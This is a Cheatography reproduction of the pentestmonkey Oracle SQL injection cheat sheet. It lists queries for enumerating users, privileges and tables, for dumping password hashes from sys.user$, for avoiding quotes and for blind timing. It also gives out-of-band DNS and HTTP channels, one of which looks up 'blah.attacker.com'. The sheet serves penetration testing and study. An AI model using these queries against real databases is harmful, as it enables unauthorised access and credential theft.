Cheatography
https://cheatography.com
Source: pentestmonkey.net
VersionSELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; | SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; | SELECT version FROM v$instance; |
CommentsSELECT 1 FROM dual — comment | – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table. |
List UsersSELECT username FROM all_users ORDER BY username; | SELECT name FROM sys.user$; — priv |
List Password HashesSELECT name, password, astatus FROM sys.user$ — priv, <= 10g | SELECT name,spare4 FROM sys.user$ — priv, 11g |
List PrivilegesSELECT * FROM session_privs; — current privs | SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs | SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv | SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS; |
Location of DB filesSELECT name FROM V$DATAFILE; |
Avoiding QuotesSELECT chr(65) || chr(66) FROM dual; — returns AB |
Hostname, IP AddressSELECT UTL_INADDR.get_host_name FROM dual; | SELECT host_name FROM v$instance; | SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address | SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames |
Time DelayBEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT | SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow | SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow | SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow |
Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1 | SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2 |
Make DNS RequestsSELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual; | SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; |
String ConcatenationSELECT ‘A’ || ‘B’ FROM dual; — returns AB |
| | Current DatabaseSELECT global_name FROM global_name; | SELECT name FROM v$database; | SELECT instance_name FROM v$instance; | SELECT SYS.DATABASE_NAME FROM DUAL; |
List DatabasesSELECT DISTINCT owner FROM all_tables; — list schemas (one per user) – Also query TNS listener for other databases. See tnscmd (services | status). |
List ColumnsSELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; | SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’; |
Bitwise ANDSELECT bitand(6,2) FROM dual; — returns 2 | SELECT bitand(6,1) FROM dual; — returns0 |
If StatementBEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements |
List DBA AccountsSELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles |
Select Nth RowSELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1) |
List TablesSELECT table_name FROM all_tables; | SELECT owner, table_name FROM all_tables; |
Find Tables From Column NameSELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case |
Select Nth CharSELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’ |
ASCII Value -> CharSELECT chr(65) FROM dual; — returns A |
CastingSELECT CAST(1 AS char) FROM dual; | SELECT CAST(’1′ AS int) FROM dual; |
Char -> ASCII ValueSELECT ascii(‘A’) FROM dual; — returns 65 |
|
Help Us Go Positive!
We offset our carbon usage with Ecologi. Click the link below to help us!
Created By
Metadata
Favourited By
Comments
No comments yet. Add yours below!
Add a Comment
Related Cheat Sheets
More Cheat Sheets by Dormidera